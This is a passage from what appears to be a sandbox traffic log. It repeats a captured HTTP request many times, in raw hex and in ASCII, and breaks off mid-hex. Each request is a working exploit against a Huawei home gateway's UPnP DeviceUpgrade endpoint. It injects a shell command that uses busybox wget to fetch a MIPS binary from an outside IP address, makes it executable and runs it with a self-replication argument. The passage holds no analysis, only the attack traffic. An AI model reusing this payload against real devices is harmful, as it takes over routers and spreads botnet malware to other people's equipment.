65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 